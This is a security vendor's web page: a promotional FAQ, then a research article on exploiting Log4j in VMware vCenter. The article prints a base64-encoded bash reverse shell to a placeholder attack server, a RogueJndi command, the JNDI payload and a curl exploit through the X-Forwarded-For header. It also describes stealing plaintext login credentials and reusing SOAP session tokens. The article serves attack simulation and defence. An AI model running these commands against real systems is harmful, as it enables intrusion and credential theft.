What is the Log4j vulnerability and why is it significant for vCenter security?

The Log4j vulnerability, publicly disclosed in December 2021, allows attackers to execute arbitrary Java code on servers running vulnerable versions of Log4j by exploiting its ability to access LDAP and JNDI servers. This vulnerability is significant for vCenter security because vCenter uses Log4j, making it susceptible to remote code execution attacks that can compromise virtual infrastructure. (Source: Cymulate Blog)

How does Cymulate research attack paths using Log4j in vCenter environments?

Cymulate's research team orchestrates full attack scenarios using Log4j exploits to help customers practice their defenses and responses. The team sets up attack environments, delivers payloads via JNDI LDAP servers, and demonstrates post-exploitation techniques, such as credential dumping and leveraging SOAP sessions for lateral movement within vCenter. (Source: Cymulate Blog)

What tools and dependencies are required to exploit Log4j in vCenter?

To exploit Log4j in vCenter, you need a JNDI LDAP server (such as RogueJndi), a reverse shell handler, and knowledge of the vulnerable headers and paths in vCenter. The attack involves sending a crafted payload to the vCenter server, typically via the 'X-Forwarded-For' HTTP header, to trigger remote code execution. (Source: Cymulate Blog)

How can attackers use vCenter after exploiting Log4j?

After exploiting Log4j, attackers can use vCenter to execute code on virtual machines, dump credentials, and potentially move laterally within the environment. Techniques include using the pyVmomi Python library to interact with vCenter APIs and leveraging stolen tokens or credentials for further exploitation. (Source: Cymulate Blog)

What is credential dumping in the context of vCenter post-exploitation?

Credential dumping involves extracting user credentials from vCenter after gaining access. This can be done by intercepting authentication data, such as the CastleAuthorization header, or by capturing session tokens like vmware_soap_session, which can be used to execute commands without supplying admin credentials. (Source: Cymulate Blog)

How does the authentication process work in vCenter, and how can it be abused?

vCenter authentication typically uses basic auth to validate user credentials, which are then exchanged for a VSPHERE-UI-JSESSIONID cookie. Attackers can intercept these credentials or session tokens to gain unauthorized access and execute commands on virtual machines. (Source: Cymulate Blog)

What is the role of pyVmomi in vCenter exploitation?

pyVmomi is a Python library provided by VMware that allows programmatic interaction with vCenter servers. In exploitation scenarios, attackers can use pyVmomi to execute code on virtual machines after obtaining valid credentials or session tokens. (Source: Cymulate Blog)

How can session tokens be used for lateral movement in vCenter?

Session tokens like vmware_soap_session can be captured and used to authenticate API requests, allowing attackers to execute commands or move laterally within the vCenter environment without needing admin credentials. (Source: Cymulate Blog)

What are the main challenges in post-exploitation of vCenter via Log4j?

Challenges include obtaining valid credentials or session tokens, understanding the flow of authentication data, and bypassing security controls such as TLS termination and proxy configurations. Attackers may need to wait for valid login attempts or find ways to intercept data at the right point in the authentication flow. (Source: Cymulate Blog)

Who contributed to Cymulate's research on Log4j and vCenter attack paths?

Roy Haimof, Security Research Team Lead at Cymulate, contributed to the research and guide on leveraging Log4j to expose vCenter attack paths. (Source: Cymulate Blog)

Where can I find more technical resources and guides from Cymulate?

You can access Cymulate's technical whitepapers, guides, data sheets, and solution briefs in the Resource Hub. These resources cover topics like exposure management, threat validation, detection engineering, and vulnerability management. (Source: Cymulate Resource Hub)

How does Cymulate Exposure Validation help with attack simulation?

Cymulate Exposure Validation enables advanced security testing by allowing users to build and execute custom attack chains in a single platform. It simplifies the process of simulating real-world threats and validating security controls. (Source: Cymulate Data Sheet)

What is the significance of attack path discovery in security validation?

Attack path discovery automates the identification of lateral movement opportunities and privilege escalation risks within an environment. This helps organizations understand and mitigate potential attack vectors before they can be exploited. (Source: Cymulate Attack Path Discovery)

How does Cymulate support detection engineering and SIEM validation?

Cymulate provides tools and guides for building, tuning, and testing SIEM, EDR, and XDR detections to improve mean time to detect and respond to threats. This includes technical resources and webinars on best practices for detection engineering. (Source: Cymulate Detection Engineering)

Where can I read more about Cymulate's research on vulnerabilities like Log4j?

Cymulate regularly publishes research on vulnerabilities, attack techniques, and security validation in their blog. You can find in-depth articles, technical guides, and case studies on recent threats and Cymulate's approach to exposure management. (Source: Cymulate Blog)

How does Cymulate help organizations prepare for real-world attacks?

Cymulate enables organizations to simulate real-world attacks, validate their defenses, and identify exploitable exposures across their IT environments. This proactive approach helps teams stay ahead of emerging threats and improve their overall security posture. (Source: Cymulate Threat Validation)

What is Cymulate's approach to continuous threat exposure management (CTEM)?

Cymulate's CTEM approach integrates validation, prioritization, and mobilization, enabling collaboration across teams to continuously manage and reduce exposure risk. The platform provides actionable metrics and insights to guide remediation efforts. (Source: Cymulate CTEM)

How can I validate my organization's resilience against Log4j and similar vulnerabilities?

Cymulate offers dedicated assessments and simulation scenarios for vulnerabilities like Log4j, allowing organizations to test their defenses, validate controls, and identify gaps in their security posture. (Source: Cymulate Log4j Resilience Assessment)

What are the key features of the Cymulate platform?

Cymulate offers continuous threat validation, unified exposure management, AI-powered optimization, complete kill chain coverage, attack path discovery, automated mitigation, and cloud validation. The platform is designed to simulate real-world threats, prioritize exposures, and automate remediation. (Source: Cymulate Homepage)

Does Cymulate integrate with other security tools?

Yes, Cymulate integrates with a wide range of security technologies, including Akamai Guardicore, AWS GuardDuty, BlackBerry Cylance OPTICS, Carbon Black EDR, Check Point CloudGuard, Cisco Secure Endpoint, CrowdStrike Falcon, Wiz, and more. For a complete list, visit the Partnerships and Integrations page. (Source: Cymulate Integrations)

What technical documentation is available for Cymulate?

Cymulate provides whitepapers, guides, data sheets, solution briefs, and reports covering topics such as exposure management, threat validation, detection engineering, and vulnerability management. Access these resources in the Resource Hub. (Source: Cymulate Resource Hub)

How easy is Cymulate to use and implement?

Cymulate is designed for quick, agentless deployment with minimal resources required. Customers report that the platform is intuitive and easy to use, with support available via email and chat. Implementation can begin almost immediately after deployment. (Source: Customer Testimonials, Cymulate)

What security and compliance certifications does Cymulate hold?

Cymulate is SOC2 Type II certified and complies with ISO 27001:2013, ISO 27701, ISO 27017, and CSA STAR Level 1. The platform is GDPR compliant and hosted in secure AWS data centers with strong encryption and high availability. (Source: Security at Cymulate)

How does Cymulate ensure data security and privacy?

Cymulate incorporates data protection by design, with a dedicated privacy and security team, secure development lifecycle, continuous vulnerability scanning, and annual third-party penetration tests. Data is encrypted in transit (TLS 1.2+) and at rest (AES-256). (Source: Security at Cymulate)

What feedback have customers given about Cymulate's ease of use?

Customers consistently praise Cymulate for its intuitive interface and ease of use. For example, Raphael Ferreira, Cybersecurity Manager at Banco PAN, stated, 'Cymulate is easy to implement and use—all you need to do is click a few buttons, and you receive a lot of practical insights into how you can improve your security posture.' (Source: Customer Testimonials, Cymulate)

What is Cymulate's pricing model?

Cymulate uses a subscription-based pricing model tailored to each organization's needs. Pricing depends on the selected package, number of assets, and scenarios. For a detailed quote, you can schedule a demo with Cymulate's team. (Source: Cymulate Pricing Model)

What business impact can customers expect from using Cymulate?

Customers have reported an 81% reduction in cyber risk within four months, a 60% increase in team efficiency, 40X faster threat validation, a 30% improvement in threat prevention, and a 52% reduction in critical exposures. (Source: Hertz Israel Case Study)

How does Cymulate compare to AttackIQ?

Cymulate offers the industry's leading threat scenario library and AI-powered capabilities for workflow automation and security posture improvement. AttackIQ provides automated security validation but lacks Cymulate's innovation, threat coverage, and ease of use. (Source: Cymulate vs AttackIQ)

How does Cymulate differ from Mandiant Security Validation?

Mandiant Security Validation is one of the original BAS platforms but has seen minimal innovation in recent years. Cymulate continually innovates with AI and automation, expanding into exposure management and maintaining a leadership position in the market. (Source: Cymulate vs Mandiant)

What makes Cymulate different from Pentera?

Pentera focuses on attack path validation but lacks the depth of Cymulate's exposure validation, which covers the full kill chain and cloud control validation. Cymulate provides a more comprehensive solution for exposure management. (Source: Cymulate vs Pentera)

How does Cymulate compare to Picus Security?

Picus Security is suitable for organizations seeking an on-premise BAS vendor, while Cymulate is ideal for those needing a complete exposure validation platform with full kill chain and cloud control validation. (Source: Cymulate vs Picus)

What are the advantages of Cymulate over SafeBreach?

Cymulate outpaces SafeBreach with unmatched innovation, precision, and automation. It offers the industry's largest attack library, a full CTEM solution, and comprehensive exposure validation. (Source: Cymulate vs SafeBreach)

How does Cymulate compare to Scythe?

Scythe is suitable for advanced red teams building custom attack campaigns, but Cymulate provides a more complete exposure validation platform with automated mitigation, continuous validation, and a library of over 100,000 attack actions. (Source: Cymulate vs Scythe)

Who can benefit from using Cymulate?

Cymulate is designed for CISOs, security leaders, SecOps teams, red teams, and vulnerability management teams in organizations across industries such as media, transportation, and financial services. (Source: Cymulate Personas)

What problems does Cymulate solve for security teams?

Cymulate addresses overwhelming threat volumes, lack of visibility, unclear prioritization, operational inefficiencies, fragmented tools, cloud complexity, and communication barriers by providing continuous threat validation, exposure prioritization, and automation. (Source: Cymulate Pain Points)

How does Cymulate tailor its solutions for different personas?

Cymulate provides CISOs with quantifiable metrics, automates processes for SecOps teams, offers advanced offensive testing for red teams, and consolidates insights for vulnerability management teams. Each persona receives solutions tailored to their specific challenges. (Source: Cymulate Personas)

What is the primary purpose of Cymulate's platform?

The primary purpose of Cymulate is to harden defenses and optimize security controls by proactively validating controls, threats, and response capabilities, helping organizations focus on exploitable exposures and strengthen their security posture. (Source: Cymulate Platform Overview)

What is Cymulate's vision and mission?

Cymulate's mission is to empower organizations to manage their security posture proactively and effectively, driving lasting change in cybersecurity through continuous exposure management and threat validation. (Source: About Cymulate)

Where can I find Cymulate's latest blog posts and research?

You can read Cymulate's latest blog posts, research, and news at the Cymulate Blog and Newsroom. (Source: Cymulate Blog & Newsroom)

How can I contact Cymulate for support or a demo?

You can contact Cymulate for support via email at support@cymulate.com, use chat support, or schedule a demo through the website. (Source: Cymulate Contact)

What is Cymulate's company background and global presence?

Cymulate was founded in 2016 and serves over 1,000 customers in 50 countries, with offices in 8 locations worldwide. The company is recognized for its innovative solutions and customer-centric approach. (Source: About Cymulate)

How to Leverage Log4j to Expose vCenter Attack Paths - Part 1

Last Updated: December 16, 2024

As Log4j hit the industry, we found ourselves orchestrating full attack scenarios for our customers to practice their defenses and responses.

While working on an attack vector from VMware vCenter to Domain Admin, we realized we were missing some tools to abuse a specific path we had in mind.

This minor obstacle gave us the excuse we needed to kickstart our research into VMware Post-Exploitation and the development of our modest toolkit which we will release later.

History

Log4j is a popular logging utility that made headlines last December following the public disclosure of a vulnerability that potentially allows attackers to execute code remotely on a targeted machine. The vulnerability takes advantage of Log4j's requests to arbitrarily access LDAP and JNDI servers, allowing attackers to execute arbitrary Java code on servers that host versions of the vulnerable software.

Amazon, Microsoft, and VMware were among the many leading companies affected, not to mention the hundreds of thousands of not as prominent organizations and companies.

We decided to focus our research on the post-exploitation stages of an attack and looked for a worthy opponent on which we could inflict some considerable damage.

Enter vCenter

vCenter Server is the centralized management utility for VMware that controls VMs, ESXs, and all other components in a centralized location.

As it so happens, vCenter uses log4j and, therefore, was a perfect candidate for our research.

Log4j Exploitation Dependencies

The first couple of steps we took were focused on setting up an attack environment and included:

A JNDI LDAP server to deliver the payload.
A reverse shell handler to control the victim once exploited.For the JNDI server, we used this GitHub repo and set up the attack server to host a reverse shell payload:

COMMAND_B64=$(echo "bash -I >& /dev/tcp/<ATTACK_SRV_ADDR>/<PORT> 0>&1" | base64)

java -jar RogueJndi-1.1.jar -c "bash -c {echo,\$COMMAND_B64}|{base64,-d}|{bash,-i}" --hostname "0.0.0.0" -l "1389" 

For the listener, we:

wrote a short Python script to listen for an incoming connection.
created an HTTP c2 to control the established connection.

Exploitation:

To exploit the log4j vulnerability, we had to know what part of our request would be written into the log. Our goal was to get a JNDI payload written into the log and trigger the vulnerability:

Payload:

${jndi:ldap://< attack_server >:<server_port>/<attack_server_path> }

Thanks to this cool tweet, we didn’t have to tinker with vCenter ourselves to find the vulnerable header and path needed to exploit the vCenter server:

Path:

/websso/SAML2/SLO/vsphere.local?SAMLRequest=HTTP/2 Header: X-Forwarded-For 

And so, our final exploit is a simple CURL command:

curl https://<vcenter_ip>:443/websso/SAML2/SLO/vsphere.local?SAMLRequest=HTTP/2 -H 'X-Forwarded-For: ${jndi:ldap://< attack_server >:<server_port>/<attack_server_path> }' --insecure

After we sent the request, we expected a reverse shell connection to be made to our c2.

Now What?

The obvious thing we had in mind was that we could use vCenter to execute code on virtual machines.

This is a good time to mention that VMware has released a Python library called pyVmomi that can help us communicate more efficiently with the vCenter server.

First, we created an authenticated object by supplying administrative user credentials:

Next, we supplied the VM creds for the context of the code execution:

Then we created the program spec:

And finally, we executed the command:

But wait, how are we supposed to get the username and password for the administrator?

General Auth:

Before trying to steal the credentials, we needed to understand how the authentication works.

When a user authenticates to the server, he sends his credentials through basic auth to the server. If the server considers them valid, it will sign a SAML auth request which the user can exchange for the VSPHERE-UI-JSESSIONID cookie.

To steal these credentials, we had to identify the best place to steal them after they reach the server.

To find a target, we used netstat to understand the flow of data to and from the server.

Vpxd, the main vCenter service, doesn’t listen for incoming connections directly but uses Envoy as a proxy instead. Reading VMware's documentation showed us that the config of Envoy is derived from rhttpproxy:

The most interesting part of rhttpproxy’s config is:

Credential Dumping

Once we had a better understanding of the general flow of data to and from the server, we had a few targets to tinker with:

We could try to get the data from Envoy after TLS termination.
We could try to MitM the vpxd-webserver-pipe.
We could try to get the data from vpxd when it reads the data.

First, we tried to authenticate while debugging the Envoy process with a trace in the background, looking for any HTTP data.

After several attempts, we managed to capture the stripped HTTP data containing CastleAuthorization:

From the data in the CastleAuthorization, we could decode the base64 to get the user and password enabling us to extract plain text credentials for any user that logs in.

Although the method above achieves the goal of giving us credentials, we still needed to wait for a valid login request, which can take some time.

SOAP Sessions

Impatient as we are, we decided to dig further and examine other requests passing by the proxy.
One of these requests looked especially interesting:

The request is authenticated with the vmware_soap_session cookie, the cookie-generated when authenticating to the Web Services API.
This means that we could potentially use the token to execute commands without supplying admin creds.

We needed to make a few adjustments, as pyVmomi doesn’t support connecting with a stolen token:

That enabled us to execute code on a remote VM supplying only the VM user and password:

What’s Next?

Obviously, the need for the VM creds is quite annoying as it limits what we can do. We were not going to stand for that!

In the next blog post, we’ll showcase our post-exploitation toolkit for vCenter.

---

Thanks to Roy Haimof, Security Research Team Lead for Cymulate for the information provided in this guide. An experienced cyber security specialist with a demonstrated history of team-leading in the military industry, Roy is passionate about helping others stay sharp against evolving cyber threats.

Table of Contents

History Enter vCenter Log4j Exploitation Dependencies Now What? Credential Dumping SOAP Sessions What’s Next?

Cymulate Exposure Validation makes advanced security testing fast and easy. When it comes to building custom attack chains, it's all right in front of you in one place.

Mike Humbert, Cybersecurity Engineer

DARLING INGREDIENTS INC.

Learn More

Featured Resources

View More Resources

blog

CVE-2026-26117: Hijacking Azure Arc on Windows for Local Privilege Escalation & Cloud Identity Takeover

CVE-2026-26117 lets attackers hijack Azure Arc on Windows, escalate to SYSTEM, and seize the machine’s cloud identity.

Demo

Exposure Validation Demo

Demo of automated offensive simulations validating detection, prevention, and IOC coverage